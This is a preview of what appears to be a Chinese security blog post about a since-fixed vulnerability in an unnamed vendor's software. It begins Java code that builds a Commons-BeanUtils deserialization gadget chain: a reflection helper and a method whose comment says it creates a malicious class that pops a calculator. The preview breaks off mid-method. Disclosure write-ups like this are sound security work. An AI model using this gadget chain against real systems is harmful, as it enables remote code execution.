文章预览
漏洞已提交,厂商已修复 cb链 某软存在cb链,先生成cb链的字节数组, package org.example ; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl ; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl ; import com.sun.org.apache.xerces.internal.impl.dv.util.Base64 ; import org.apache.commons.beanutils.BeanComparator ; import java.io.* ; import java.lang.reflect.Field ; import java.util.Arrays ; import java.util.PriorityQueue ; public class Main implements Serializable { public static void setFieldValue ( Object obj , String fieldName , Object value ) throws Exception { Field field = obj . getClass (). getDeclaredField ( fieldName ); field . setAccessible ( true ); field . set ( obj , value ); } //创建恶意类,弹出计算器 public static TemplatesImpl generateTemplates () throws Exception { byte []
………………………………